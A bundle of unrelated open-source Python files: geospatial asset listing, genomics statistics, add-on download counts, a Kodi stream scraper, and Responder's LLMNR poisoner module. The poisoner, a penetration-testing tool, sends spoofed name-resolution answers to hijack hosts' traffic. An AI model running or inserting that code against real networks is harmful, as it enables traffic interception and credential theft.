'mosaico': 'projects/mapbiomas-workspace/MOSAICOS/workspace',
'classificacao': 'projects/mapbiomas-workspace/COLECAO2_1/classificacao',
'classificacao-ft': 'projects/mapbiomas-workspace/COLECAO2_1/classificacao-ft'
}
}
def __init__(self, options=None):
if options != None:
self.options.update(options)
ee.Initialize()
def listGroupAssets(self, bioma=None):
"""
        Dictionary of task_ids of the processed and temporary images, grouped by collection
"""
results = {}
results['mosaico'] = self.listByProcessedStatus(self.options['assets']['mosaico'], bioma)
time.sleep(1)
results['classificacao'] = self.listByProcessedStatus(self.options['assets']['classificacao'], bioma)
time.sleep(1)
results['classificacao-ft'] = self.listByProcessedStatus(self.options['assets']['classificacao-ft'], bioma)
time.sleep(1)
return results
def listByProcessedStatus(self, collection_id, bioma=None):
"""
        Lists the task_ids of the processed and temporary images of the requested collection
        Keyword arguments:
        collection_id -- asset address of the collection
"""
img_collection = ee.ImageCollection(collection_id).filterMetadata('task_id', 'not_equals', None)
if bioma != None:
img_collection = img_collection.filterMetadata('biome', 'equals', bioma)
        # list of images in the collection
img_list = img_collection.toList(20000)
        # map the image list to a list of {id, task_id} entries
img_taskid_list = img_list.map(lambda img: self.__map_img_taskid(img))
        # download the list from Earth Engine
dataall = img_taskid_list.getInfo()
        # split processed and temporary images
data = filter(lambda imgdata: imgdata[
'id'].find('_temp') == -1, dataall)
data_temp = filter(lambda imgdata: imgdata[
'id'].find('_temp') >= 0, dataall)
        # map both lists down to task_ids only
data_task_ids = map(lambda imgdata: int(imgdata['task_id']), data)
data_temp_task_ids = map(
lambda imgdata: int(imgdata['task_id']), data_temp)
        # return a dictionary with processed and temporary task_ids kept separate
return {'processed': data_task_ids, 'temp': data_temp_task_ids}
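    # Example return value of listByProcessedStatus (hypothetical task ids):
    #   {'processed': [101, 102], 'temp': [103]}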
def __map_img_taskid(self, img):
"""
Retorna id e task_id da img informada
Keyword arguments:
img -- ee.BaseAlgorith da imagem
"""
eeimg = ee.Image(img)
return {'id': eeimg.id(), 'task_id': eeimg.get('task_id')}
if __name__ == '__main__':
params = sys.argv
bioma = None
try:
bioma = params[1]
    except IndexError:
bioma = None
exportstatus = ExportGeeAssetsStatus()
print(json.dumps(exportstatus.listGroupAssets(bioma)))
| TerrasAppSolutions/seeg-mapbiomas-workspace | app/Console/Scripts/export_gee_assets_status.py | Python | mit | 3,165 |
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import fingerprint
from packets import LLMNR_Ans
from utils import *
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
def Parse_LLMNR_Name(data):
import codecs
NameLen = data[12]
if (sys.version_info > (3, 0)):
return data[13:13+NameLen]
else:
NameLen2 = int(codecs.encode(NameLen, 'hex'), 16)
return data[13:13+int(NameLen2)]
def IsICMPRedirectPlausible(IP):
dnsip = []
with open('/etc/resolv.conf', 'r') as file:
for line in file:
ip = line.split()
if len(ip) < 2:
continue
elif ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
if settings.Config.AnalyzeMode:
IsICMPRedirectPlausible(settings.Config.Bind_To)
class LLMNR(BaseRequestHandler): # LLMNR Server class
def handle(self):
try:
data, soc = self.request
Name = Parse_LLMNR_Name(data).decode("latin-1")
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == b'\x00\x00' and Parse_IPV6_Addr(data):
Finger = None
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
if settings.Config.AnalyzeMode:
LineHeader = "[Analyze mode: LLMNR]"
print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
LineHeader = "[*] [LLMNR]"
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
if Finger is not None:
print(text("[FINGER] OS Version : %s" % color(Finger[0], 3)))
print(text("[FINGER] Client Version : %s" % color(Finger[1], 3)))
except:
raise
| snar5/Responder | poisoners/LLMNR.py | Python | gpl-3.0 | 3,475 |
# Big Data Smart Socket
# Copyright (C) 2016 Clemson University
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from ..transfer.mechanisms import available_mechanisms
cli_help = "List transfer mechanisms available on this machine."
def configure_parser(parser):
pass
def handle_action(args, parser):
for m in available_mechanisms():
print(m)
| feltus/BDSS | client/client/actions/mechanisms_action.py | Python | gpl-2.0 | 1,025 |
#!/usr/bin/env python
#coding: utf-8
#### FUNCTIONS ####
def header(string):
"""
Display header
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print '\n', timeInfo, "****", string, "****"
def subHeader(string):
"""
Display subheader
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, "**", string, "**"
def info(string):
"""
Display basic information
"""
timeInfo = time.strftime("%Y-%m-%d %H:%M")
print timeInfo, string
#### MAIN ####
## Import modules ##
import argparse
import sys
import os.path
import formats
import time
import scipy.stats as stats
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
## Graphic style ##
sns.set_style("white")
sns.set_style("ticks")
## Get user's input ##
parser = argparse.ArgumentParser(description= """""")
parser.add_argument('inputVCF', help='Multisample VCF with genotyped source elements')
parser.add_argument('metadata', help='Text file with the project and ancestry code per donor Id')
parser.add_argument('-o', '--outDir', default=os.getcwd(), dest='outDir', help='output directory. Default: current working directory.' )
args = parser.parse_args()
inputVCF = args.inputVCF
metadata = args.metadata
outDir = args.outDir
scriptName = os.path.basename(sys.argv[0])
## Display configuration to standard output ##
print
print "***** ", scriptName, " configuration *****"
print "inputVCF: ", inputVCF
print "metadata: ", metadata
print "outDir: ", outDir
print
print "***** Executing ", scriptName, ".... *****"
print
## Start ##
#### 1. Read input multi-sample VCF and generate a VCF object
#############################################################
header("1. Process multi-sample VCF as input")
VCFObj = formats.VCF()
donorIdList = VCFObj.read_VCF_multiSample(inputVCF)
#### 2. Read metadata file
##########################
# Initialize four dictionaries with the following structure:
# - dict1a: key(ancestryCode) -> dict1b: key(donorId) -> nbSourceElements
# - dict2a: key(donorId) -> ancestryCode
# - dict3a: key(donorId) -> projectCode
# - dict4a: key(ancestryCode) -> Total number of chromosome copies in the population (number of individuals with a given ancestry * 2 chromosomes)
header("2. Read ancestry codes file")
metadataFile = open(metadata, 'r')
nbSourceElementsDict = {}
donorIdAncestryDict = {}
donorIdProjectCodeDict = {}
ancestryTotalAlleleCountDict = {}
for line in metadataFile:
line = line.rstrip('\r\n')
# Skip header
if not line.startswith("#"):
line = line.split('\t')
donorId = line[0]
tumorType = line[1]
ancestryCode = line[2]
### Dict1a and Dict1b
if ancestryCode not in nbSourceElementsDict:
# Create dictionary
nbSourceElementsDict[ancestryCode] = {}
# Initialize to 0 values:
nbSourceElementsDict[ancestryCode][donorId] = 0
### dict2a
donorIdAncestryDict[donorId] = ancestryCode
### dict3a
donorIdProjectCodeDict[donorId] = tumorType
### dict4a
# Initialize ancestry counter
if ancestryCode not in ancestryTotalAlleleCountDict:
ancestryTotalAlleleCountDict[ancestryCode] = 1
# Update counter
else:
ancestryTotalAlleleCountDict[ancestryCode] += 1
print "nbDonors-ancestry: ", ancestryTotalAlleleCountDict
## Multiply by 2 the number of donors per ancestry to obtain the total allele count:
for ancestry in ancestryTotalAlleleCountDict:
ancestryTotalAlleleCountDict[ancestry] = ancestryTotalAlleleCountDict[ancestry] * 2
print "total-alleleCount-ancestry: ", ancestryTotalAlleleCountDict
#### 3. Compute parameters
##########################
# - Number of source elements per donor. Donors classified according to their ancestry
# - Global allele counts per source element across full PCAWG cohort
# - Variant allele counts per source element and per tumor type == Source elements load per tumor type
# - Variant allele frequencies per source element and ancestry == Source elements load per ancestry (to do)
## Store info in four dictionaries:
# globalAlleleFreqDict - dict4a: key(sourceElementId) -> allele frequency across full PCAWG cohort
# alleleCountPerTumorDict - dict5a: key(sourceElementId) -> dict5b: key(projectCode) -> allele Count
# alleleCountPerAncestryDict - dict6a: key(sourceElementId) -> dict6b: key(ancestryCode) -> allele Count
# alleleFreqPerAncestryDict - dict7a: key(sourceElementId) -> dict7b: key(ancestryCode) -> allele frequency
globalAlleleFreqDict = {}
alleleCountPerTumorDict = {}
alleleCountPerAncestryDict = {}
alleleFreqPerAncestryDict = {}
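# Shapes of the dictionaries above, with hypothetical keys and values:
#   alleleCountPerTumorDict['22:100-200']['BRCA-EU'] = 7
#   alleleFreqPerAncestryDict['22:100-200']['EUR'] = 0.12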
header("3. Compute parameters")
# Open output file ('w' so a rerun does not append a duplicate header)
outFilePath = outDir + '/germline_source_element_alleleCount_VAF.tsv'
outFile = open(outFilePath, 'w')
# Write header:
row = '#SourceElement' + "\t" + 'alleleCount' + "\t" + 'VAF' + "\n"
outFile.write(row)
## For each MEI:
for MEIObj in VCFObj.lineList:
end = (MEIObj.infoDict["BKPB"] if "BKPB" in MEIObj.infoDict else "UNK")
sourceElementId = MEIObj.chrom + ':' + str(MEIObj.pos) + '-' + str(end)
print "** source element ** ", sourceElementId
## Initialize Dict5a and dict7a for source element
alleleCountPerTumorDict[sourceElementId] = {}
alleleFreqPerAncestryDict[sourceElementId] = {}
# Initialize allele count per project code to 0 values:
for projectCode in donorIdProjectCodeDict.values():
alleleCountPerTumorDict[sourceElementId][projectCode] = 0
## Initialize Dict6a for source element
alleleCountPerAncestryDict[sourceElementId] = {}
# Initialize allele count per ancestry to 0 values:
for ancestry in ancestryTotalAlleleCountDict:
alleleCountPerAncestryDict[sourceElementId][ancestry] = 0
#print "Initialized-dict1: ", alleleCountPerTumorDict
#print "Initialized-dict2: ", alleleCountPerAncestryDict
## Total number of chromosome copies in the population
# Number of donors * 2 (diploid, two copies of a given chromosome)
totalNbChrom = len(MEIObj.genotypesDict) * 2
#print "total-nb-copies: ", totalNbChrom
## For each donor genotype:
alleleCount = 0
for donorId, genotypeField in MEIObj.genotypesDict.iteritems():
ancestryCode = donorIdAncestryDict[donorId]
projectCode = donorIdProjectCodeDict[donorId]
genotypeFieldList = genotypeField.split(":")
genotype = genotypeFieldList[0]
#### Update counters and store VAF values
## A) Insertion absent in reference genome
if (MEIObj.alt == "<MEI>"):
# print "Insertion absent in reference genome", donorId, genotype, projectCode
# a) Heterozygous
if (genotype == "0/1"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
alleleCount += 1
alleleCountPerTumorDict[sourceElementId][projectCode] += 1
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 1
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
# b) Homozygous alternative
elif (genotype == "1/1"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
alleleCount += 2
alleleCountPerTumorDict[sourceElementId][projectCode] += 2
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 2
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
            # c) the remaining possibility, a missing genotype (./.), is ignored
## B) Insertion in reference genome and absent in donor genome
elif (MEIObj.ref == "<MEI>"):
# print "Insertion in reference genome", donorId, genotype, projectCode
# a) Heterozygous
if (genotype == "0/1"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
alleleCount += 1
alleleCountPerTumorDict[sourceElementId][projectCode] += 1
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 1
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
# b) Homozygous reference
elif (genotype == "0/0"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
alleleCount += 2
alleleCountPerTumorDict[sourceElementId][projectCode] += 2
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 2
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
            # c) the remaining possibility, a missing genotype (./.), is ignored
## C) Raise error...
else:
msg="Incorrectly formated VCF line"
info(msg)
## Compute global variant allele frequency (VAF)
alleleFrequency = float(alleleCount) / totalNbChrom
    # Save VAF in a dictionary keyed by source element id
globalAlleleFreqDict[sourceElementId] = alleleFrequency
# Write source element allele count and frequency in the output table
chrom = MEIObj.chrom
pos = MEIObj.pos
element = MEIObj.infoDict["CLASS"]
row = sourceElementId + "\t" + str(alleleCount) + "\t" + str(alleleFrequency) + "\n"
outFile.write(row)
## Compute source element variant allele frequency across ancestries
for ancestryCode in alleleCountPerAncestryDict[sourceElementId]:
totalAlleleCountAncestry = ancestryTotalAlleleCountDict[ancestryCode]
alleleCountInAncestry = alleleCountPerAncestryDict[sourceElementId][ancestryCode]
alleleFreqInAncestry = float(alleleCountInAncestry) / totalAlleleCountAncestry
print "test: ", sourceElementId, ancestryCode, totalAlleleCountAncestry, alleleCountInAncestry, alleleFreqInAncestry
alleleFreqPerAncestryDict[sourceElementId][ancestryCode] = alleleFreqInAncestry
print "---------------------"
print "Finished-dict1: ", alleleCountPerTumorDict
print "Finished-dict2: ", alleleCountPerAncestryDict
print "Finished-dict3: ", alleleFreqPerAncestryDict
#### 4. Make tables:
####################
### 4.1 Source element allele count per tumor type
# Create pandas dataframe from dictionary
df=pd.DataFrame(alleleCountPerTumorDict)
# transpose dictionary to have source elements as rows and tumor types as columns
df=df.T
# Save output into tsv
outFilePath = outDir + '/germline_source_element_alleleCount_perTumorType.tsv'
df.to_csv(outFilePath, sep='\t')
### 4.2 Source element allele frequency per ancestry
# Create pandas dataframe from dictionary
df=pd.DataFrame(alleleFreqPerAncestryDict)
# transpose dictionary to have source elements as rows and tumor types as columns
df=df.T
# Save output into tsv
outFilePath = outDir + '/germline_source_element_alleleFreq_perAncestry.tsv'
df.to_csv(outFilePath, sep='\t')
#### 5. Make plots:
###################
header("5. Make plots")
# - Variant allele frequencies histogram across PCAWG donors
# - Number of source elements per donor and ancestry. Boxplot
# - Number of source elements per donor and ancestry. Violin Plot
#### 5.1 Source element variant allele frequencies across PCAWG donors
header("5.1 Make variant allele frequencies plot")
alleleFreqList = globalAlleleFreqDict.values()
fig = plt.figure(figsize=(5,6))
fig.suptitle('Variant allele frequencies (VAF)', fontsize=14)
## Make plot
ax1 = fig.add_subplot(1, 1, 1)
plt.hist(alleleFreqList, bins=10, color='#008000', alpha=0.75)
plt.xlabel("VAF", fontsize=14)
plt.ylabel("# L1 source elements", fontsize=12)
plt.xlim(0, 1)
# Remove top and right axes
ax1.get_xaxis().tick_bottom()
ax1.get_yaxis().tick_left()
# Add a horizontal grid to the plot, but make it very light in color
# so we can use it for reading data values but not be distracting
ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
ax1.set_axisbelow(True)
## Customize ticks
plt.xticks(np.arange(0, 1.01, 0.1))
locs, labels = plt.xticks()
# plt.setp(labels, rotation=30)
## Save figure
fileName = outDir + "/germline_source_element_VAF_hist.pdf"
plt.savefig(fileName)
#### 5.2 Number of source elements per donor and ancestry
header("5.2 Number of source elements per donor and ancestry")
### A) Boxplot
## Organize the data for plotting
tupleListNbSourceElements = []
for ancestryCode in sorted(nbSourceElementsDict):
# Make tuple (ancestryCode, list with number of source elements per donor)
nbDonors= len(nbSourceElementsDict[ancestryCode].values())
xLabel = ancestryCode + '(' + str(nbDonors) + ')'
nbSourceElementsTuple = (xLabel, nbSourceElementsDict[ancestryCode].values())
# Add tuple to the list
tupleListNbSourceElements.append(nbSourceElementsTuple)
## Unzip the (label, counts) tuples into two parallel lists:
# - ancestryCodesList: one x-axis label per ancestry
# - nbSourceElementsPerDonor: one list of per-donor counts per ancestry
tmpList = map(list, zip(*tupleListNbSourceElements))
ancestryCodesList = tmpList[0]
nbSourceElementsPerDonor = tmpList[1]
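# e.g. zip(*[('EUR(10)', [4, 5]), ('EAS(8)', [3, 6])]) regroups the tuples into
# [('EUR(10)', 'EAS(8)'), ([4, 5], [3, 6])]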
### Plotting
fig = plt.figure(figsize=(5,6))
fig.suptitle('# Source elements per donor', fontsize=14)
ax1 = fig.add_subplot(1, 1, 1)
# Create the boxplot
bp = ax1.boxplot(nbSourceElementsPerDonor)
plt.ylabel("# Source L1", fontsize=12)
## Customize boxplot:
# change outline color, fill color and linewidth of the boxes
for box in bp['boxes']:
# change outline color
box.set( color='#696969', linewidth=1)
# change color and linewidth of the whiskers
for whisker in bp['whiskers']:
whisker.set(color='#696969', linewidth=1)
# change color and linewidth of the caps
for cap in bp['caps']:
cap.set(color='#696969', linewidth=1)
# change color and linewidth of the medians
for median in bp['medians']:
median.set(color='#8b0000', linewidth=2)
# Add the ancestry codes to the x-axis
ax1.set_xticklabels(ancestryCodesList, fontsize = 10)
locs, labels = plt.xticks()
# plt.setp(labels, rotation=25)
# Remove top and right axes
ax1.get_xaxis().tick_bottom()
ax1.get_yaxis().tick_left()
# Add a horizontal grid to the plot, but make it very light in color
# so we can use it for reading data values but not be distracting
ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
ax1.set_axisbelow(True)
## Save figure
fileName = outDir + "/nb_germline_source_element_perDonor_boxplot.pdf"
fig.savefig(fileName)
### B) Violin plot
## Organize the data for plotting into a dictionary:
# - dict1:
# nbSourceElements -> list[nbSourceElementsDonor1, nbSourceElementsDonor2, ..., nbSourceElementsDonorN]
# ancestry -> list[ancestryDonor1, ancestryDonor2, ..., ancestryDonorN]
dict4pandas = {}
dict4pandas['nbSourceElements'] = []
dict4pandas['ancestry'] = []
for ancestryCode in sorted(nbSourceElementsDict):
nbSourceElementsPerDonorList = nbSourceElementsDict[ancestryCode].values()
nbDonors = len(nbSourceElementsPerDonorList)
xLabel = ancestryCode + '(' + str(nbDonors) + ')'
xLabelList = [ xLabel ] * nbDonors
dict4pandas['nbSourceElements'] = dict4pandas['nbSourceElements'] + nbSourceElementsPerDonorList
dict4pandas['ancestry'] = dict4pandas['ancestry'] + xLabelList
# Make pandas dataframe from dict:
dataframe = pd.DataFrame(dict4pandas)
### Plotting
fig = plt.figure(figsize=(5,6))
fig.suptitle('# Source elements per donor', fontsize=14)
# Create the violin plot
ax = sns.violinplot(x='ancestry', y='nbSourceElements', data=dataframe, palette="muted")
# y limit
#sns.plt.ylim(0,21)
## Modify axis labels
ax.set(xlabel='', ylabel='# Source L1')
# Remove top and right axes
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# Add a horizontal grid to the plot, but make it very light in color
# so we can use it for reading data values but not be distracting
ax.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
ax.set_axisbelow(True)
## Save figure
fileName = outDir + "/nb_germline_source_element_perDonor_violinPlot.pdf"
fig.savefig(fileName)
####
header("Finished")
| brguez/TEIBA | src/python/sourceElements.stats.py | Python | gpl-3.0 | 18,064 |
import codecs
from datetime import datetime, timedelta
from optparse import make_option
from os import path, unlink
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
import olympia.core.logger
from olympia.addons.models import Addon
from olympia.files.models import File
from olympia.stats.models import update_inc, DownloadCount
from olympia.zadmin.models import DownloadSource
from . import get_date_from_file, save_stats_to_file
log = olympia.core.logger.getLogger('adi.downloadcountsfromfile')
def is_valid_source(src, fulls, prefixes):
"""Return True if the source is valid.
    A source is valid if it is in the list of valid full sources or contains
    one of the valid prefix sources as a substring.
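    Illustrative checks (hypothetical source names):
    >>> is_valid_source('dp-btn-primary', {'dp-btn-primary'}, [])
    True
    >>> is_valid_source('search-suggestion', set(), ['search'])
    True
    >>> is_valid_source('unknown', set(), [])
    False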
"""
return src in fulls or any(p in src for p in prefixes)
class Command(BaseCommand):
"""Update download count metrics from a file in the database.
Usage:
./manage.py download_counts_from_file <folder> --date=YYYY-MM-DD
If no date is specified, the default is the day before.
    If no folder is specified, the default is `hive_results/YYYY-MM-DD/`.
This folder will be located in `<settings.NETAPP_STORAGE>/tmp`.
We get a row for each "addon download" request, in this format:
    <day> <count> <file id or add-on id or add-on slug> <click source>
We insert one DownloadCount entry per addon per day, and each row holds
the json-ified dict of click sources/counters.
Eg, for the above request:
date: <the date of the day the queries were made>
count: <the number of requests for this addon, for this day>
addon: <the addon that has this id>
src: {'dp-btn-primary': 1}
"""
help = __doc__
option_list = BaseCommand.option_list + (
make_option('--date', action='store', type='string',
dest='date', help='Date in the YYYY-MM-DD format.'),
make_option('--separator', action='store', type='string', default='\t',
dest='separator', help='Field separator in file.'),
)
def handle(self, *args, **options):
start = datetime.now() # Measure the time it takes to run the script.
day = options['date']
if not day:
day = (datetime.now() - timedelta(days=1)).strftime('%Y-%m-%d')
folder = args[0] if args else 'hive_results'
folder = path.join(settings.TMP_PATH, folder, day)
sep = options['separator']
filepath = path.join(folder, 'download_counts.hive')
# Make sure we're not trying to update with mismatched data.
if get_date_from_file(filepath, sep) != day:
raise CommandError('%s file contains data for another day' %
filepath)
# First, make sure we don't have any existing counts for the same day,
# or it would just increment again the same data.
DownloadCount.objects.filter(date=day).delete()
# Memoize the files to addon relations and the DownloadCounts.
download_counts = {}
# Perf: preload all the files and slugs once and for all.
# This builds two dicts:
# - One where each key (the file_id we get from the hive query) has
# the addon_id as value.
# - One where each key (the add-on slug) has the add-on_id as value.
files_to_addon = dict(File.objects.values_list('id',
'version__addon_id'))
slugs_to_addon = dict(Addon.objects.public().values_list('slug', 'id'))
# Only accept valid sources, which are listed in the DownloadSource
# model. The source must either be exactly one of the "full" valid
# sources, or prefixed by one of the "prefix" valid sources.
fulls = set(DownloadSource.objects.filter(type='full').values_list(
'name', flat=True))
prefixes = DownloadSource.objects.filter(type='prefix').values_list(
'name', flat=True)
with codecs.open(filepath, encoding='utf8') as count_file:
for index, line in enumerate(count_file):
if index and (index % 1000000) == 0:
log.info('Processed %s lines' % index)
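                # illustrative well-formed row (tab-separated):
                # 2017-01-01<TAB>42<TAB>123456<TAB>dp-btn-primary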
splitted = line[:-1].split(sep)
if len(splitted) != 4:
log.debug('Badly formatted row: %s' % line)
continue
day, counter, id_or_slug, src = splitted
try:
# Clean up data.
id_or_slug = id_or_slug.strip()
counter = int(counter)
except ValueError:
# Ignore completely invalid data.
continue
if id_or_slug.strip().isdigit():
# If it's a digit, then it should be a file id.
try:
id_or_slug = int(id_or_slug)
except ValueError:
continue
# Does this file exist?
if id_or_slug in files_to_addon:
addon_id = files_to_addon[id_or_slug]
# Maybe it's an add-on ?
elif id_or_slug in files_to_addon.values():
addon_id = id_or_slug
else:
# It's an integer we don't recognize, ignore the row.
continue
else:
# It's probably a slug.
if id_or_slug in slugs_to_addon:
addon_id = slugs_to_addon[id_or_slug]
else:
# We've exhausted all possibilities, ignore this row.
continue
if not is_valid_source(src, fulls=fulls, prefixes=prefixes):
continue
# Memoize the DownloadCount.
if addon_id in download_counts:
dc = download_counts[addon_id]
else:
dc = DownloadCount(date=day, addon_id=addon_id, count=0)
download_counts[addon_id] = dc
# We can now fill the DownloadCount object.
dc.count += counter
dc.sources = update_inc(dc.sources, src, counter)
# Create in bulk: this is much faster.
DownloadCount.objects.bulk_create(download_counts.values(), 100)
for download_count in download_counts.values():
save_stats_to_file(download_count)
log.info('Processed a total of %s lines' % (index + 1))
log.debug('Total processing time: %s' % (datetime.now() - start))
# Clean up file.
log.debug('Deleting {path}'.format(path=filepath))
unlink(filepath)
| harikishen/addons-server | src/olympia/stats/management/commands/download_counts_from_file.py | Python | bsd-3-clause | 6,839 |
#!/usr/bin/python3
# Copyright (c) 2015 Davide Gessa
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from libcontractvm import Wallet, WalletExplorer, ConsensusManager
from forum import ForumManager
import sys
import time
consMan = ConsensusManager.ConsensusManager ()
consMan.bootstrap ("http://127.0.0.1:8181")
wallet = WalletExplorer.WalletExplorer (wallet_file='test.wallet')
srMan = ForumManager.ForumManager (consMan, wallet=wallet)
while True:
pollid = input ('Insert the id of the poll: ')
choice = input ('Insert the choice for the poll: ')
try:
print ('Broadcasted:', srMan.vote (pollid, choice))
	except Exception as e:
		print ('Error:', e)
| andreasscalas/dappforum | samples/vote.py | Python | mit | 734 |
# -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @Daddy_Blamo wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import re
import urllib
import urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser
class source:
def __init__(self):
self.priority = 1
self.language = ['de']
self.domains = ['kinoking.to']
self.base_link = 'https://kinoking.to'
self.search_link = '/?s=%s'
self.get_link = '/links/%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = self.__search([localtitle] + source_utils.aliases_to_array(aliases))
if not url and title != localtitle: url = self.__search([title] + source_utils.aliases_to_array(aliases))
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = self.__search([localtvshowtitle] + source_utils.aliases_to_array(aliases))
if not url and tvshowtitle != localtvshowtitle: url = self.__search([tvshowtitle] + source_utils.aliases_to_array(aliases))
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
s = '-%sx%s/' % (season, episode)
url = url.rstrip('/')
url = url + s
url = urlparse.urljoin(self.base_link, url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return sources
query = urlparse.urljoin(self.base_link, url)
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'id': 'downloads'})
r = dom_parser.parse_dom(r, 'table')
r = dom_parser.parse_dom(r, 'tbody')
r = dom_parser.parse_dom(r, 'tr')
for i in r:
if re.search('German', i[1]):
hoster = re.search('(?<=domain=)(.*?)(?=\")', i[1])
hoster = hoster.group().lower()
valid, hoster = source_utils.is_host_valid(hoster, hostDict)
if not valid: continue
link = re.search('(?<=links/)(.*?)(?=/)', i[1])
link = link.group()
if re.search('<td>HD</td>', i[1]):
quality = 'HD'
else:
quality = 'SD'
url = self.__get_link(link)
sources.append({'source': hoster, 'quality': quality, 'language': 'de', 'url': url, 'direct': False, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url
def __search(self, titles):
try:
query = self.search_link % (urllib.quote_plus(cleantitle.query(titles[0])))
query = urlparse.urljoin(self.base_link, query)
t = [cleantitle.get(i) for i in set(titles) if i]
r = client.request(query)
r = dom_parser.parse_dom(r, 'article')
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'title'})
r = dom_parser.parse_dom(r, 'a', req='href')
for i in r:
                title = client.replaceHTMLCodes(i[1])
title = cleantitle.get(title)
if title in t:
return source_utils.strip_domain(i[0]['href'])
return
except:
return
def __get_link(self, link):
try:
if not link:
return
query = self.get_link % link
query = urlparse.urljoin(self.base_link, query)
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'boton'})
r = dom_parser.parse_dom(r, 'a', req='href')
r = r[0].attrs['href']
return r
except:
return | RuiNascimento/krepo | script.module.lambdascrapers/lib/lambdascrapers/sources_ lambdascrapers/de/kinoking.py | Python | gpl-2.0 | 4,845 |
"""
Utils function.
"""
import sys
import os
import logging
from glob import glob
def add_pyspark_path_if_needed():
"""Add PySpark to the library path based on the value of SPARK_HOME if
